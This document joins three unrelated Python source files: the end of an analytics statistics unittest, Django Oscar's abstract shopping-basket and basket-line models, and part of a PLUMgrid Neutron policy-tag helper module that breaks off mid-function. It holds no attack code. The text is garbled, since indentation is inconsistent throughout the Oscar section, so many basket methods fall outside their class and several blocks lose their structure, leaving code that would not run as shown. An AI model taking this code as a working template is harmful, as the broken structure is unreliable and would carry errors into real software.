        generator_obj.send_test_stat("t04","lyyy","samp1",4,3.4);
        generator_obj.send_test_stat("t04","lyyy","samp1",2,4,"",5);

        logging.info("Checking Stats " + str(UTCTimestampUsec()))
        assert generator_obj.verify_test_stat("StatTable.StatTestState.st","-2m",
            select_fields = [ "MAX(st.i1)"],
            where_clause = 'name|st.s1=t04|samp1', num = 1, check_rows =
            [{u'MAX(st.i1)': 4}]);
        assert generator_obj.verify_test_stat("StatTable.StatTestState.st","-2m",
            select_fields = [ "MIN(st.d1)"],
            where_clause = 'name|st.s1=t04|samp1', num = 1, check_rows =
            [{u'MIN(st.d1)': 3.4}]);
        return True
    # end test_03_min_max_query

    #@unittest.skip('Get samples from objectlog stats')
    def test_04_statprefix_obj(self):
        '''
        This test starts redis,vizd,opserver and qed
        It uses the test class' cassandra instance
        Then it sends test object stats to the collector
        and checks if they can be accessed from QE, using prefix-suffix indexes
        '''
        logging.info("*** test_04_statprefix_obj ***")
        if StatsTest._check_skip_test() is True:
            return True

        vizd_obj = self.useFixture(
            AnalyticsFixture(logging, builddir,
                             self.__class__.redis_port,
                             self.__class__.cassandra_port))
        assert vizd_obj.verify_on_setup()
        assert vizd_obj.verify_collector_obj_count()
        collectors = [vizd_obj.get_collector()]

        generator_obj = self.useFixture(
            StatsFixture("VRouterAgent", collectors,
                         logging, vizd_obj.get_opserver_port()))
        assert generator_obj.verify_on_setup()

        logging.info("Starting stat gen " + str(UTCTimestampUsec()))
        generator_obj.send_test_obj_stat("t010","lxxx","samp1",1,1);
        generator_obj.send_test_obj_stat("t010","lyyy","samp1",2,2);
        generator_obj.send_test_obj_stat("t010","lyyy","samp3",2,2,"",5);
        generator_obj.send_test_obj_stat("t011","lyyy","samp2",1,1.1,"",7);
        generator_obj.send_test_obj_stat("t011","lxxx","samp2",2,1.2);
        generator_obj.send_test_obj_stat("t011","lxxx","samp2",2,1.2,"",9);

        logging.info("Checking Objectlog Stats str-str " + str(UTCTimestampUsec()))
        assert generator_obj.verify_test_stat("StatTable.StatTestObj.st","-2m",
            select_fields = [ "UUID", "st.s1", "st.i1", "st.d1" ],
            where_clause = 'name|st.s1=t010|samp1', num = 2, check_rows =
            [{ "st.s1":"samp1", "st.i1":2, "st.d1":2},
             { "st.s1":"samp1", "st.i1":1, "st.d1":1}]);
        return True
    # end test_04_statprefix_obj

    #@unittest.skip('Send stats with 2nd level of hierarchy')
    def test_05_statprefix_double(self):
        '''
        This test starts redis,vizd,opserver and qed
        It uses the test class' cassandra instance
        Then it sends test 2nd-level stats to the collector
        and checks if they can be accessed from QE, using prefix-suffix indexes
        '''
        logging.info("*** test_05_statprefix_double ***")
        if StatsTest._check_skip_test() is True:
            return True

        vizd_obj = self.useFixture(
            AnalyticsFixture(logging, builddir,
                             self.__class__.redis_port,
                             self.__class__.cassandra_port))
        assert vizd_obj.verify_on_setup()
        assert vizd_obj.verify_collector_obj_count()
        collectors = [vizd_obj.get_collector()]

        generator_obj = self.useFixture(
            StatsFixture("VRouterAgent", collectors,
                         logging, vizd_obj.get_opserver_port()))
        assert generator_obj.verify_on_setup()

        logging.info("Starting stat gen " + str(UTCTimestampUsec()))
        generator_obj.send_test_stat_double("t010","lxxx","samp1",1,1);
        generator_obj.send_test_stat_double("t010","lyyy","samp1",2,3);
        generator_obj.send_test_stat_double("t010","lyyy","samp3",2,3,"misc2",5);
        generator_obj.send_test_stat_double("t011","lyyy","samp2",1,1.1,"misc1",7);
        generator_obj.send_test_stat_double("t011","lxxx","samp2",2,1.2);
        generator_obj.send_test_stat_double("t011","lxxx","samp2",2,1.2,"",9);

        logging.info("Checking 2nd-level Stats str-double" + str(UTCTimestampUsec()))
        assert generator_obj.verify_test_stat("StatTable.StatTestStateDouble.dst.st","-2m",
            select_fields = [ "UUID", "dst.st.s1", "dst.st.i1", "dst.l1" ],
            where_clause = 'dst.l1|dst.st.s2=lyyy|misc1', num = 1, check_rows =
            [{ "dst.st.s1":"samp2", "dst.st.i1":1, "dst.l1":"lyyy"}]);
        return True
    # end test_05_statprefix_double

    @staticmethod
    def get_free_port():
        # Bind to port 0 to let the OS pick a free port, then release it.
        # (Small race window before the caller rebinds; acceptable in tests.)
        cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        cs.bind(("", 0))
        cport = cs.getsockname()[1]
        cs.close()
        return cport

    @staticmethod
    def _check_skip_test():
        # All tests are skipped on the 'build01' host.
        if (socket.gethostname() == 'build01'):
            logging.info("Skipping test")
            return True
        return False
def _term_handler(*_):
    # NOTE(review): `IntSignal` is not defined or imported anywhere in this
    # module's visible scope -- confirm it is provided elsewhere, otherwise
    # this handler raises NameError when SIGINT is delivered.
    raise IntSignal()

if __name__ == '__main__':
    # Turn SIGINT into an exception so unittest can tear fixtures down.
    gevent.signal(signal.SIGINT,_term_handler)
    unittest.main(catchbreak=True)
| |
from decimal import Decimal as D
import zlib
from django.db import models
from django.db.models import Sum
from django.conf import settings
from django.utils.timezone import now
from django.utils.translation import ugettext_lazy as _
from django.core.exceptions import ObjectDoesNotExist, PermissionDenied
from oscar.apps.basket.managers import OpenBasketManager, SavedBasketManager
from oscar.apps.offer import results
from oscar.core.compat import AUTH_USER_MODEL
from oscar.templatetags.currency_filters import currency
class AbstractBasket(models.Model):
"""
Basket object
"""
# Baskets can be anonymously owned - hence this field is nullable. When a
# anon user signs in, their two baskets are merged.
owner = models.ForeignKey(
AUTH_USER_MODEL, related_name='baskets', null=True,
verbose_name=_("Owner"))
# Basket statuses
# - Frozen is for when a basket is in the process of being submitted
# and we need to prevent any changes to it.
OPEN, MERGED, SAVED, FROZEN, SUBMITTED = (
"Open", "Merged", "Saved", "Frozen", "Submitted")
STATUS_CHOICES = (
(OPEN, _("Open - currently active")),
(MERGED, _("Merged - superceded by another basket")),
(SAVED, _("Saved - for items to be purchased later")),
(FROZEN, _("Frozen - the basket cannot be modified")),
(SUBMITTED, _("Submitted - has been ordered at the checkout")),
)
status = models.CharField(
_("Status"), max_length=128, default=OPEN, choices=STATUS_CHOICES)
# A basket can have many vouchers attached to it. However, it is common
# for sites to only allow one voucher per basket - this will need to be
# enforced in the project's codebase.
vouchers = models.ManyToManyField(
'voucher.Voucher', null=True, verbose_name=_("Vouchers"), blank=True)
date_created = models.DateTimeField(_("Date created"), auto_now_add=True)
date_merged = models.DateTimeField(_("Date merged"), null=True, blank=True)
date_submitted = models.DateTimeField(_("Date submitted"), null=True,
blank=True)
# Only if a basket is in one of these statuses can it be edited
editable_statuses = (OPEN, SAVED)
class Meta:
abstract = True
app_label = 'basket'
verbose_name = _('Basket')
verbose_name_plural = _('Baskets')
objects = models.Manager()
open = OpenBasketManager()
saved = SavedBasketManager()
def __init__(self, *args, **kwargs):
    super(AbstractBasket, self).__init__(*args, **kwargs)

    # We keep a cached copy of the basket lines as we refer to them often
    # within the same request cycle. Also, applying offers will append
    # discount data to the basket lines which isn't persisted to the DB and
    # so we want to avoid reloading them as this would drop the discount
    # information.
    self._lines = None
    # Accumulates the results of applying offers during this request cycle.
    self.offer_applications = results.OfferApplications()
def __unicode__(self):
    """Short human-readable summary: status, owner and line count."""
    template = _(
        u"%(status)s basket (owner: %(owner)s, lines: %(num_lines)d)")
    return template % {'status': self.status,
                       'owner': self.owner,
                       'num_lines': self.num_lines}
# ========
# Strategy
# ========
@property
def has_strategy(self):
    # True once a strategy has been assigned via the `strategy` property
    # setter (normally done per-request by basket middleware).
    return hasattr(self, '_strategy')
def _get_strategy(self):
    # Fail loudly with guidance when no strategy was assigned, instead of
    # surfacing a confusing AttributeError deeper in pricing code.
    if not self.has_strategy:
        raise RuntimeError(
            "No strategy class has been assigned to this basket. "
            "This is normally assigned to the incoming request in "
            "oscar.apps.basket.middleware.BasketMiddleware. "
            "Since it is missing, you must be doing something different. "
            "Ensure that a strategy instance is assigned to the basket!"
        )
    return self._strategy

def _set_strategy(self, strategy):
    self._strategy = strategy

# Pricing/availability strategy for this basket; see has_strategy above.
strategy = property(_get_strategy, _set_strategy)
def all_lines(self):
    """
    Return a cached queryset of this basket's lines.

    Caching matters for offers: they annotate the line instances with
    discount data that is never persisted, so re-fetching from the DB
    would silently drop that information.
    """
    # An unsaved basket cannot have any lines yet.
    if self.id is None:
        return self.lines.none()
    if self._lines is None:
        queryset = self.lines.select_related('product', 'stockrecord')
        self._lines = queryset.prefetch_related('attributes',
                                                'product__images')
    return self._lines
def is_quantity_allowed(self, qty):
    """
    Test whether ``qty`` more items may be added to this basket.

    Returns a ``(is_allowed, reason)`` tuple; ``reason`` is ``None`` when
    the quantity is permitted. A maximum threshold is enforced to prevent
    a denial-of-service attack via the offers system.
    """
    threshold = settings.OSCAR_MAX_BASKET_QUANTITY_THRESHOLD
    if threshold:
        headroom = threshold - self.num_items
        if qty > headroom:
            message = _(
                "Due to technical limitations we are not able "
                "to ship more than %(threshold)d items in one order.") \
                % {'threshold': threshold}
            return False, message
    return True, None
# ============
# Manipulation
# ============
    def flush(self):
        """
        Remove all lines from basket.

        Raises PermissionDenied when the basket is frozen.
        """
        if self.status == self.FROZEN:
            raise PermissionDenied("A frozen basket cannot be flushed")
        self.lines.all().delete()
        # Invalidate the cached line queryset.
        self._lines = None
    def add_product(self, product, quantity=1, options=None):
        """
        Add a product to the basket

        'stock_info' is the price and availability data returned from
        a partner strategy class.

        The 'options' list should contain dicts with keys 'option' and
        'value' which link the relevant product.Option model and string value
        respectively.

        If a line with the same reference already exists, its quantity is
        increased instead of creating a new line.
        """
        if options is None:
            options = []
        if not self.id:
            # The basket must exist in the DB before lines can reference it.
            self.save()
        # Ensure that all lines are the same currency
        price_currency = self.currency
        stock_info = self.strategy.fetch_for_product(product)
        if price_currency and stock_info.price.currency != price_currency:
            raise ValueError((
                "Basket lines must all have the same currency. Proposed "
                "line has currency %s, while basket has currency %s")
                % (stock_info.price.currency, price_currency))
        if stock_info.stockrecord is None:
            raise ValueError((
                "Basket lines must all have stock records. Strategy hasn't "
                "found any stock record for product %s") % product)
        # Line reference is used to distinguish between variations of the same
        # product (eg T-shirts with different personalisations)
        line_ref = self._create_line_reference(
            product, stock_info.stockrecord, options)
        # Determine price to store (if one exists). It is only stored for
        # audit and sometimes caching.
        defaults = {
            'quantity': quantity,
            'price_excl_tax': stock_info.price.excl_tax,
            'price_currency': stock_info.price.currency,
        }
        if stock_info.price.is_tax_known:
            defaults['price_incl_tax'] = stock_info.price.incl_tax
        line, created = self.lines.get_or_create(
            line_reference=line_ref,
            product=product,
            stockrecord=stock_info.stockrecord,
            defaults=defaults)
        if created:
            for option_dict in options:
                line.attributes.create(option=option_dict['option'],
                                       value=option_dict['value'])
        else:
            line.quantity += quantity
            line.save()
        # Offers must be re-applied now the basket contents have changed.
        self.reset_offer_applications()
    add_product.alters_data = True
    # Shorthand alias.
    add = add_product
    def applied_offers(self):
        """
        Return a dict of offers successfully applied to the basket.

        This is used to compare offers before and after a basket change to see
        if there is a difference.
        """
        return self.offer_applications.offers

    def reset_offer_applications(self):
        """
        Remove any discounts so they get recalculated
        """
        self.offer_applications = results.OfferApplications()
        # Also drop the cached lines, which carry in-memory discount state.
        self._lines = None
    def merge_line(self, line, add_quantities=True):
        """
        For transferring a line from another basket to this one.

        This is used with the "Saved" basket functionality.

        :line: The line from the other basket to absorb.
        :add_quantities: When True, quantities of matching lines are summed;
            otherwise the maximum of the two quantities is kept.
        """
        try:
            existing_line = self.lines.get(line_reference=line.line_reference)
        except ObjectDoesNotExist:
            # Line does not already exist - reassign its basket
            line.basket = self
            line.save()
        else:
            # Line already exists - assume the max quantity is correct and
            # delete the old
            if add_quantities:
                existing_line.quantity += line.quantity
            else:
                existing_line.quantity = max(existing_line.quantity,
                                             line.quantity)
            existing_line.save()
            line.delete()
        finally:
            # Either way, the cached lines are now stale.
            self._lines = None
    merge_line.alters_data = True
    def merge(self, basket, add_quantities=True):
        """
        Merges another basket with this one.

        :basket: The basket to merge into this one.
        :add_quantities: Whether to add line quantities when they are merged.

        The other basket is marked as MERGED and saved; its vouchers are
        transferred to this basket.
        """
        # Use basket.lines.all instead of all_lines as this function is called
        # before a strategy has been assigned.
        for line_to_merge in basket.lines.all():
            self.merge_line(line_to_merge, add_quantities)
        basket.status = self.MERGED
        basket.date_merged = now()
        basket._lines = None
        basket.save()
        # Ensure all vouchers are moved to the new basket
        for voucher in basket.vouchers.all():
            basket.vouchers.remove(voucher)
            self.vouchers.add(voucher)
    merge.alters_data = True
    def freeze(self):
        """
        Freezes the basket so it cannot be modified.
        """
        self.status = self.FROZEN
        self.save()
    freeze.alters_data = True

    def thaw(self):
        """
        Unfreezes a basket so it can be modified again
        """
        self.status = self.OPEN
        self.save()
    thaw.alters_data = True

    def submit(self):
        """
        Mark this basket as submitted

        Records the submission timestamp as a side effect.
        """
        self.status = self.SUBMITTED
        self.date_submitted = now()
        self.save()
    submit.alters_data = True

    # Kept for backwards compatibility
    set_as_submitted = submit
def is_shipping_required(self):
"""
Test whether the basket contains physical products that require
shipping.
"""
for line in self.all_lines():
if line.product.is_shipping_required:
return True
return False
# =======
# Helpers
# =======
def _create_line_reference(self, product, stockrecord, options):
"""
Returns a reference string for a line based on the item
and its options.
"""
base = '%s_%s' % (product.id, stockrecord.id)
if not options:
return base
return "%s_%s" % (base, zlib.crc32(repr(options).encode('utf8')))
    def _get_total(self, property):
        """
        For executing a named method on each line of the basket
        and returning the total.

        :property: Name of the line attribute/property to sum.
        """
        total = D('0.00')
        for line in self.all_lines():
            try:
                total += getattr(line, property)
            except ObjectDoesNotExist:
                # Handle situation where the product may have been deleted
                pass
        return total
# ==========
# Properties
# ==========
    @property
    def is_empty(self):
        """
        Test if this basket is empty
        """
        # An unsaved basket cannot have lines.
        return self.id is None or self.num_lines == 0

    @property
    def is_tax_known(self):
        """
        Test if tax values are known for this basket
        """
        return all([line.is_tax_known for line in self.all_lines()])
    @property
    def total_excl_tax(self):
        """
        Return total line price excluding tax
        """
        return self._get_total('line_price_excl_tax_incl_discounts')

    @property
    def total_tax(self):
        """Return total tax across all basket lines"""
        return self._get_total('line_tax')

    @property
    def total_incl_tax(self):
        """
        Return total price inclusive of tax and discounts
        """
        return self._get_total('line_price_incl_tax_incl_discounts')

    @property
    def total_incl_tax_excl_discounts(self):
        """
        Return total price inclusive of tax but exclusive discounts
        """
        return self._get_total('line_price_incl_tax')

    @property
    def total_discount(self):
        # Sum of all line discounts currently applied to the basket.
        return self._get_total('discount_value')
    @property
    def offer_discounts(self):
        """
        Return basket discounts from non-voucher sources. Does not include
        shipping discounts.
        """
        return self.offer_applications.offer_discounts

    @property
    def voucher_discounts(self):
        """
        Return discounts from vouchers
        """
        return self.offer_applications.voucher_discounts

    @property
    def has_shipping_discounts(self):
        # True when at least one shipping discount has been applied.
        return len(self.shipping_discounts) > 0

    @property
    def shipping_discounts(self):
        """
        Return discounts applied to shipping
        """
        return self.offer_applications.shipping_discounts

    @property
    def post_order_actions(self):
        """
        Return deferred post-order actions from applied offers
        """
        return self.offer_applications.post_order_actions

    @property
    def grouped_voucher_discounts(self):
        """
        Return discounts from vouchers but grouped so that a voucher which
        links to multiple offers is aggregated into one object.
        """
        return self.offer_applications.grouped_voucher_discounts
    @property
    def total_excl_tax_excl_discounts(self):
        """
        Return total price excluding tax and discounts
        """
        return self._get_total('line_price_excl_tax')

    @property
    def num_lines(self):
        """Return number of lines"""
        return self.all_lines().count()

    @property
    def num_items(self):
        """Return number of items"""
        # Uses self.lines.all() (not all_lines) so it works before a
        # strategy has been assigned.
        return sum(line.quantity for line in self.lines.all())

    @property
    def num_items_without_discount(self):
        # Total quantity of items with no discount applied.
        num = 0
        for line in self.all_lines():
            num += line.quantity_without_discount
        return num

    @property
    def num_items_with_discount(self):
        # Total quantity of items with a discount applied.
        num = 0
        for line in self.all_lines():
            num += line.quantity_with_discount
        return num
    @property
    def time_before_submit(self):
        # Timedelta between creation and submission, or None if the basket
        # has not been submitted.
        if not self.date_submitted:
            return None
        return self.date_submitted - self.date_created
@property
def time_since_creation(self, test_datetime=None):
if not test_datetime:
test_datetime = now()
return test_datetime - self.date_created
    @property
    def contains_a_voucher(self):
        # An unsaved basket cannot have vouchers attached.
        if not self.id:
            return False
        return self.vouchers.exists()

    @property
    def is_submitted(self):
        return self.status == self.SUBMITTED

    @property
    def can_be_edited(self):
        """
        Test if a basket can be edited
        """
        return self.status in self.editable_statuses

    @property
    def currency(self):
        # Since all lines should have the same currency, return the currency of
        # the first one found.  Implicitly returns None for an empty basket.
        for line in self.all_lines():
            return line.price_currency
# =============
# Query methods
# =============
    def contains_voucher(self, code):
        """
        Test whether the basket contains a voucher with a given code
        """
        if self.id is None:
            # Unsaved basket: no vouchers possible.
            return False
        try:
            self.vouchers.get(code=code)
        except ObjectDoesNotExist:
            return False
        else:
            return True

    def product_quantity(self, product):
        """
        Return the quantity of a product in the basket

        The basket can contain multiple lines with the same product, but
        different options and stockrecords. Those quantities are summed up.
        """
        matching_lines = self.lines.filter(product=product)
        quantity = matching_lines.aggregate(Sum('quantity'))['quantity__sum']
        # aggregate() returns None when there are no matching lines.
        return quantity or 0

    def line_quantity(self, product, stockrecord, options=None):
        """
        Return the current quantity of a specific product and options
        """
        ref = self._create_line_reference(product, stockrecord, options)
        try:
            return self.lines.get(line_reference=ref).quantity
        except ObjectDoesNotExist:
            return 0
class AbstractLine(models.Model):
    """
    A line of a basket (product and a quantity)

    Discount state (``_discount_excl_tax``, ``_discount_incl_tax``,
    ``_affected_quantity``) is held in memory only and is not persisted.
    """
    basket = models.ForeignKey('basket.Basket', related_name='lines',
                               verbose_name=_("Basket"))

    # This is to determine which products belong to the same line
    # We can't just use product.id as you can have customised products
    # which should be treated as separate lines. Set as a
    # SlugField as it is included in the path for certain views.
    line_reference = models.SlugField(
        _("Line Reference"), max_length=128, db_index=True)

    product = models.ForeignKey(
        'catalogue.Product', related_name='basket_lines',
        verbose_name=_("Product"))

    # We store the stockrecord that should be used to fulfil this line.
    stockrecord = models.ForeignKey(
        'partner.StockRecord', related_name='basket_lines')

    quantity = models.PositiveIntegerField(_('Quantity'), default=1)

    # We store the unit price incl tax of the product when it is first added to
    # the basket. This allows us to tell if a product has changed price since
    # a person first added it to their basket.
    price_currency = models.CharField(
        _("Currency"), max_length=12, default=settings.OSCAR_DEFAULT_CURRENCY)
    price_excl_tax = models.DecimalField(
        _('Price excl. Tax'), decimal_places=2, max_digits=12,
        null=True)
    price_incl_tax = models.DecimalField(
        _('Price incl. Tax'), decimal_places=2, max_digits=12, null=True)

    # Track date of first addition
    date_created = models.DateTimeField(_("Date Created"), auto_now_add=True)

    def __init__(self, *args, **kwargs):
        super(AbstractLine, self).__init__(*args, **kwargs)
        # Instance variables used to persist discount information.
        # In-memory only; reloading the line from the DB resets them.
        self._discount_excl_tax = D('0.00')
        self._discount_incl_tax = D('0.00')
        self._affected_quantity = 0

    class Meta:
        abstract = True
        app_label = 'basket'
        unique_together = ("basket", "line_reference")
        verbose_name = _('Basket line')
        verbose_name_plural = _('Basket lines')

    def __unicode__(self):
        return _(
            u"Basket #%(basket_id)d, Product #%(product_id)d, quantity"
            u" %(quantity)d") % {'basket_id': self.basket.pk,
                                 'product_id': self.product.pk,
                                 'quantity': self.quantity}

    def save(self, *args, **kwargs):
        # Guard: lines of non-editable (e.g. frozen/submitted) baskets
        # must not be modified.
        if not self.basket.can_be_edited:
            raise PermissionDenied(
                _("You cannot modify a %s basket") % (
                    self.basket.status.lower(),))
        return super(AbstractLine, self).save(*args, **kwargs)

    # =============
    # Offer methods
    # =============

    def clear_discount(self):
        """
        Remove any discounts from this line.
        """
        self._discount_excl_tax = D('0.00')
        self._discount_incl_tax = D('0.00')
        self._affected_quantity = 0

    def discount(self, discount_value, affected_quantity, incl_tax=True):
        """
        Apply a discount to this line

        :discount_value: Monetary amount to discount.
        :affected_quantity: How many units the discount covers.
        :incl_tax: Whether the discount was computed against tax-inclusive
            prices.  Mixing tax-inclusive and tax-exclusive discounts on
            the same line raises RuntimeError.
        """
        if incl_tax:
            if self._discount_excl_tax > 0:
                raise RuntimeError(
                    "Attempting to discount the tax-inclusive price of a line "
                    "when tax-exclusive discounts are already applied")
            self._discount_incl_tax += discount_value
        else:
            if self._discount_incl_tax > 0:
                raise RuntimeError(
                    "Attempting to discount the tax-exclusive price of a line "
                    "when tax-inclusive discounts are already applied")
            self._discount_excl_tax += discount_value
        self._affected_quantity += int(affected_quantity)

    def consume(self, quantity):
        """
        Mark all or part of the line as 'consumed'

        Consumed items are no longer available to be used in offers.
        """
        # Cap at the quantity not yet affected so _affected_quantity never
        # exceeds the line quantity.
        if quantity > self.quantity - self._affected_quantity:
            inc = self.quantity - self._affected_quantity
        else:
            inc = quantity
        self._affected_quantity += int(inc)

    def get_price_breakdown(self):
        """
        Return a breakdown of line prices after discounts have been applied.

        Returns a list of (unit_price_incl_tax, unit_price_excl_tax, quantity)
        tuples.
        """
        if not self.is_tax_known:
            raise RuntimeError("A price breakdown can only be determined "
                               "when taxes are known")
        prices = []
        if not self.discount_value:
            prices.append((self.unit_price_incl_tax, self.unit_price_excl_tax,
                           self.quantity))
        else:
            # Need to split the discount among the affected quantity
            # of products.
            item_incl_tax_discount = (
                self.discount_value / int(self._affected_quantity))
            item_excl_tax_discount = item_incl_tax_discount * self._tax_ratio
            item_excl_tax_discount = item_excl_tax_discount.quantize(D('0.01'))
            prices.append((self.unit_price_incl_tax - item_incl_tax_discount,
                           self.unit_price_excl_tax - item_excl_tax_discount,
                           self._affected_quantity))
            if self.quantity_without_discount:
                prices.append((self.unit_price_incl_tax,
                               self.unit_price_excl_tax,
                               self.quantity_without_discount))
        return prices

    # =======
    # Helpers
    # =======

    @property
    def _tax_ratio(self):
        # Ratio of tax-exclusive to tax-inclusive unit price; 0 when the
        # tax-inclusive price is falsy, avoiding division by zero.
        if not self.unit_price_incl_tax:
            return 0
        return self.unit_price_excl_tax / self.unit_price_incl_tax

    # ==========
    # Properties
    # ==========

    @property
    def has_discount(self):
        # True when at least one unit of this line is discounted.
        return self.quantity > self.quantity_without_discount

    @property
    def quantity_with_discount(self):
        return self._affected_quantity

    @property
    def quantity_without_discount(self):
        return int(self.quantity - self._affected_quantity)

    @property
    def is_available_for_discount(self):
        return self.quantity_without_discount > 0

    @property
    def discount_value(self):
        # Only one of the incl- and excl- discounts should be non-zero
        return max(self._discount_incl_tax, self._discount_excl_tax)

    @property
    def purchase_info(self):
        """
        Return the stock/price info
        """
        if not hasattr(self, '_info'):
            # Cache the PurchaseInfo instance.
            self._info = self.basket.strategy.fetch_for_product(
                self.product, self.stockrecord)
        return self._info

    @property
    def is_tax_known(self):
        return self.purchase_info.price.is_tax_known

    @property
    def unit_effective_price(self):
        """
        The price to use for offer calculations
        """
        return self.purchase_info.price.effective_price

    @property
    def unit_price_excl_tax(self):
        return self.purchase_info.price.excl_tax

    @property
    def unit_price_incl_tax(self):
        return self.purchase_info.price.incl_tax

    @property
    def unit_tax(self):
        return self.purchase_info.price.tax

    @property
    def line_price_excl_tax(self):
        return self.quantity * self.unit_price_excl_tax

    @property
    def line_price_excl_tax_incl_discounts(self):
        if self._discount_excl_tax:
            return self.line_price_excl_tax - self._discount_excl_tax
        if self._discount_incl_tax:
            # This is a tricky situation. We know the discount as calculated
            # against tax inclusive prices but we need to guess how much of the
            # discount applies to tax-exclusive prices. We do this by
            # assuming a linear tax and scaling down the original discount.
            return self.line_price_excl_tax \
                - self._tax_ratio * self._discount_incl_tax
        return self.line_price_excl_tax

    @property
    def line_price_incl_tax_incl_discounts(self):
        # We use whichever discount value is set. If the discount value was
        # calculated against the tax-exclusive prices, then the line price
        # including tax
        return self.line_price_incl_tax - self.discount_value

    @property
    def line_tax(self):
        return self.quantity * self.unit_tax

    @property
    def line_price_incl_tax(self):
        return self.quantity * self.unit_price_incl_tax

    @property
    def description(self):
        # Product title plus any chosen options, e.g. "T-shirt (size = 'L')".
        d = str(self.product)
        ops = []
        for attribute in self.attributes.all():
            ops.append("%s = '%s'" % (attribute.option.name, attribute.value))
        if ops:
            # NOTE(review): str.decode only exists on Python 2 byte strings;
            # verify this path under Python 3.
            d = "%s (%s)" % (d.decode('utf-8'), ", ".join(ops))
        return d

    def get_warning(self):
        """
        Return a warning message about this basket line if one is applicable

        This could be things like the price has changed
        """
        if not self.stockrecord:
            msg = u"'%(product)s' is no longer available"
            return _(msg) % {'product': self.product.get_title()}
        if not self.price_incl_tax:
            # No stored price to compare against.
            return
        if not self.purchase_info.price.is_tax_known:
            return
        # Compare current price to price when added to basket
        current_price_incl_tax = self.purchase_info.price.incl_tax
        if current_price_incl_tax != self.price_incl_tax:
            product_prices = {
                'product': self.product.get_title(),
                'old_price': currency(self.price_incl_tax),
                'new_price': currency(current_price_incl_tax)
            }
            if current_price_incl_tax > self.price_incl_tax:
                warning = _("The price of '%(product)s' has increased from"
                            " %(old_price)s to %(new_price)s since you added"
                            " it to your basket")
                return warning % product_prices
            else:
                warning = _("The price of '%(product)s' has decreased from"
                            " %(old_price)s to %(new_price)s since you added"
                            " it to your basket")
                return warning % product_prices
class AbstractLineAttribute(models.Model):
    """
    An attribute of a basket line

    Stores a single option/value pair chosen for a line.
    """
    line = models.ForeignKey('basket.Line', related_name='attributes',
                             verbose_name=_("Line"))
    option = models.ForeignKey('catalogue.Option', verbose_name=_("Option"))
    value = models.CharField(_("Value"), max_length=255)

    class Meta:
        abstract = True
        app_label = 'basket'
        verbose_name = _('Line attribute')
        verbose_name_plural = _('Line attributes')
| |
# Copyright 2016 PLUMgrid, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# service type constants:
from networking_plumgrid.neutron.plugins.common import constants as \
net_pg_const
from networking_plumgrid.neutron.plugins.common import exceptions as plum_excep
from networking_plumgrid.neutron.plugins.common import \
policy_exceptions as policy_exc
from oslo_log import log as logging
from oslo_utils import uuidutils
LOG = logging.getLogger(__name__)
def _retrieve_subnet_dict(self, port_db, context):
"""
Helper function to retrieve the subnet dictionary
"""
# Retrieve subnet information
subnet_db = {}
if len(port_db["fixed_ips"]) != 0:
for subnet_index in range(0,
len(port_db["fixed_ips"])):
subnet_id = (port_db["fixed_ips"][subnet_index]
["subnet_id"])
subnet_db[subnet_index] = self._get_subnet(context, subnet_id)
return subnet_db
def _check_floatingip_in_use(self, fp_id, ptag_db):
"""
Helper function to check if Floating IP already exists and
is associated with a SecurityGroup/PolicyTag
"""
for entry in ptag_db:
if fp_id == entry["floatingip_id"]:
return True
return False
def _check_floatingip_network(self, context, ptag_db):
    """
    Helper function to check Floating IP is from the specified
    External Network

    Returns a (floatingip_db, router_id) tuple on success.

    Raises:
        FloatingIPAlreadyInUse: when the floating IP is already bound to
            a port.
        GatewayNotSet: when no candidate gateway router is found.
        MultipleExternalGatewaysFound: when more than one candidate
            gateway router is found.
    """
    floatingip_db = self.get_floatingip(context,
        ptag_db["policy_tag"]["floatingip_id"])
    router_db = self.get_routers(context,
        filters={"tenant_id": [ptag_db["policy_tag"]["tenant_id"]]})
    floating_net_id = floatingip_db["floating_network_id"]
    if floatingip_db.get('port_id') is not None:
        raise policy_exc.FloatingIPAlreadyInUse(id=str(floatingip_db["id"]))
    external_gateway = []
    # An explicit router_id in the request wins over gateway discovery.
    if "router_id" in ptag_db["policy_tag"] and \
            ptag_db["policy_tag"]["router_id"] is not None:
        external_gateway.append(ptag_db["policy_tag"]["router_id"])
    else:
        # Collect tenant routers whose external gateway is on the floating
        # IP's network.
        for router in router_db:
            if ("external_gateway_info" in router and
                    router["external_gateway_info"] and
                    router["external_gateway_info"]
                    ["network_id"] == floating_net_id):
                external_gateway.append(router["id"])
    if len(external_gateway) == 0:
        raise policy_exc.GatewayNotSet(id=str(floatingip_db["id"]))
    if len(external_gateway) > 1:
        raise policy_exc.MultipleExternalGatewaysFound(
            gateway_list=external_gateway)
    return (floatingip_db, external_gateway[0])
def _check_duplicate_ports_policy_service_create(self, ps_db):
    """
    Helper function to check if duplicate ingress, egress, bidirectional
    ports exist in a create policy service JSON.

    Returns a (duplicate_found, section_label) tuple; the label names the
    offending section, or "create parameters" for cross-section
    duplicates, and is None when no duplicates exist.
    """
    sections = (("ingress_ports", "ingress ports"),
                ("egress_ports", "egress ports"),
                ("bidirectional_ports", "bidirectional ports"))
    port_list = []
    for key, label in sections:
        if key in ps_db and ps_db[key]:
            port_list.append(set(tuple(d.items()) for d in ps_db[key]))
            if _check_duplicate_ports_config(ps_db[key]):
                return True, label
    if _check_duplicate_ports_across_config(port_list):
        return True, "create parameters"
    return False, None
def _check_duplicate_ports_policy_service_update(self, ps_db):
    """
    Helper function to check if duplicate ingress, egress, bidirectional
    ports exist in an update policy service JSON.

    Returns a (duplicate_found, section_label) tuple; the label names the
    offending section, or "update parameters" for cross-section
    duplicates, and is None when no duplicates exist.
    """
    # NOTE: the "remove engress ports" label reproduces the historical
    # message verbatim.
    sections = (("add_ingress_ports", "add ingress ports"),
                ("add_egress_ports", "add egress ports"),
                ("add_bidirectional_ports", "add bidirectional ports"),
                ("remove_ingress_ports", "remove ingress ports"),
                ("remove_egress_ports", "remove engress ports"),
                ("remove_bidirectional_ports", "remove bidirectional ports"))
    port_list = []
    for key, label in sections:
        if key in ps_db and ps_db[key]:
            port_list.append(set(tuple(d.items()) for d in ps_db[key]))
            if _check_duplicate_ports_config(ps_db[key]):
                return True, label
    if _check_duplicate_ports_across_config(port_list):
